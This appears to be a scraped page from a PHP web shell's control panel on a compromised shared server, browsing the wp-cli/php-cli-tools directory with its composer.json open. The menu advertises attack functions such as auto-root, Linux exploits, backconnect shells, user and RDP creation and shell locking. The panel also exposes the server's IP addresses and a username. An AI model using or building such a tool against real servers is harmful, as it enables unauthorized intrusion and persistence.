Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
wp-cli /
php-cli-tools /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
examples
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.actrc
129
B
-rw-r--r--
.editorconfig
591
B
-rw-r--r--
.travis.yml
299
B
-rw-r--r--
LICENSE
1.03
KB
-rw-r--r--
README.md
2.08
KB
-rw-r--r--
composer.json
1.54
KB
-rw-r--r--
http-console.php
1.78
KB
-rw-r--r--
phpunit.xml.dist
648
B
-rw-r--r--
test.php
617
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "wp-cli/php-cli-tools", "type": "library", "description": "Console utilities for PHP", "keywords": ["console", "cli"], "homepage": "http://github.com/wp-cli/php-cli-tools", "license": "MIT", "authors": [ { "name": "Daniel Bachhuber", "email": "daniel@handbuilt.co", "role": "Maintainer" }, { "name": "James Logsdon", "email": "jlogsdon@php.net", "role": "Developer" } ], "require": { "php": ">= 5.3.0" }, "require-dev": { "roave/security-advisories": "dev-latest", "wp-cli/wp-cli-tests": "^4" }, "extra": { "branch-alias": { "dev-master": "0.11.x-dev" } }, "minimum-stability": "dev", "prefer-stable": true, "autoload": { "psr-0": { "cli": "lib/" }, "files": [ "lib/cli/cli.php" ] }, "config": { "allow-plugins": { "dealerdirect/phpcodesniffer-composer-installer": true, "johnpbloch/wordpress-core-installer": true } }, "scripts": { "behat": "run-behat-tests", "behat-rerun": "rerun-behat-tests", "lint": "run-linter-tests", "phpcs": "run-phpcs-tests", "phpunit": "run-php-unit-tests", "prepare-tests": "install-package-tests", "test": [ "@lint", "@phpcs", "@phpunit", "@behat" ] } }
Close